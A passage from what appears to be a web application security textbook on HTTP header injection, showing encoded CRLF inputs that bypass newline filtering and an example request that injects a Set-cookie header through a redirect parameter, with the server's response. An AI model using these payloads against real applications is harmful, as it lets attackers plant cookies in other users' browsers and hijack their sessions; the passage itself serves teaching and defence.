If you find that newline characters are being blocked or sanitized by the

foo%00%0d%0abar

foo%250d%250abar

foo%%0d0d%%0a0abar

If it is possible to inject arbitrary headers and message body content into the

response, then this behavior can be used to attack other users of the applica-

tion in various ways.

Injecting Cookies

A URL can be constructed that sets arbitrary cookies within the browser of any

user who requests it. For example:

GET /redir.php?target=/%0d%0aSet-cookie:+SessId%3d120a12f98e8; HTTP/1.1

Host: wahh-app.com

HTTP/1.1 302 Object moved

Location: /

Set-cookie: SessId=120a12f98e8;

If suitably configured, these cookies may persist across different browser

sessions. Target users can be induced to access the malicious URL via the same

delivery mechanisms that were described for reflected XSS vulnerabilities

(email, third-party web site, etc.).